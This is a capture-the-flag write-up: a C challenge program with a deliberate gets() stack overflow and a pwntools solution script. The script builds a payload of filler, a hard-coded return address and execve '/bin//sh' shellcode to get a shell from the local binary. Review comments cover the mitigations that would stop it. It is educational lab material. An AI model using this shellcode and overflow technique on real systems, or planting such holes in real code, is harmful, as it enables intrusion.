THANK YOU CHRISTOS
#include <stdio.h>
#include <string.h>
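/*
 * Prototype added because main() calls vuln_func() before its definition.
 * C99 and later have no implicit function declarations, and current
 * compilers reject the call without this line.
 */
void vuln_func(void);

/*
 * Entry point of the challenge binary: print the banner, then hand control
 * to vuln_func(), which reads the user's answer.
 */
int main(void){
    /* "\n" is a single escape here; a doubled backslash would print the two
       characters '\' and 'n' instead of ending the line. */
    printf("Do you like jump ROPing?\n");
    vuln_func();
    return 0;
}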
/*
 * Reads one line from stdin into a 16-byte stack buffer and prints a fixed
 * reply. This is the deliberately vulnerable function of the challenge.
 *
 * gets() takes no length argument, so a line longer than 15 characters is
 * written past the end of input[] into adjacent stack memory; on typical
 * ABIs that includes the saved return address. gets() was removed from the
 * language in C11 for this reason. The bounded equivalent is
 * fgets(input, sizeof input, stdin).
 *
 * NOTE(review): whether the overflow can redirect execution depends on build
 * settings not shown here (stack protector, non-executable stack, PIE). The
 * accompanying solution script presumably relies on them being disabled.
 */
void vuln_func(){
char input[16];
gets(input); /* unbounded copy from stdin into a 16-byte buffer */
printf("I actually don't care about your opinions. Cry about it");
}
/*
 * Prints the flag by running "/bin/cat flag.txt" through the shell.
 * flag.txt is a relative path, so it is resolved against the process's
 * current working directory.
 *
 * Nothing in this listing calls win(); it is reachable only if control flow
 * is redirected to it.
 *
 * NOTE(review): system() is declared in <stdlib.h>, which this listing does
 * not include.
 */
void win(){
system("/bin/cat flag.txt");
}
Solution
from pwn import *
import struct
# Solution script for the stack overflow in vuln_func() of the local CTF
# binary ./tc2.
#
# 32-bit Linux shellcode, kept in the four chunks the author used. The byte
# values spell out "/bin//sh" and end in int 0x80 system calls (execve, then
# exit).
# NOTE(review): the backslashes are doubled in this listing, which looks like
# an escaping artifact of the page; as written, each "\\x31" is four literal
# characters rather than one byte.
shellcode = b"".join(
    (
        b"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73",
        b"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89",
        b"\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b",
        b"\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80",
    )
)

# First attempt, kept for reference: same layout, but with the return address
# 0x080cfa9b. The write-up reports that this one fails.
#payload = b'A'*28 + b'\\x9b\\xfa\\x0c\\x08' + shellcode

# Layout of the line fed to gets(): filler, a 4-byte little-endian address,
# then the shellcode directly behind it.
# NOTE(review): 28 is presumably the distance from input[] to the saved return
# address in this particular build; it is not derivable from the C source.
# Mitigation view: a hard-coded absolute address plus code placed on the stack
# presumably only works when the binary is built without PIE and with an
# executable stack. NX, PIE/ASLR and a stack protector each break this layout,
# and replacing gets() with a bounded read removes the overflow itself.
payload = b"".join(
    (
        b'A'*28,                  # filler up to the saved return address
        b'\\x07\\x98\\x04\\x08',  # 0x08049807, the gadget address that works
        shellcode,
    )
)

# Start the target locally; sendline() appends the newline that ends gets().
p = process('./tc2')
#gdb.attach(p)
p.sendline(payload)
# Hand the terminal over to whatever the process runs next.
p.interactive()
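The first payload (the commented-out line) fails because the ROP gadget it points to is in .rodata (read-only data), a section that holds constants rather than code and is normally not mapped executable, so returning into it faults instead of running the gadget.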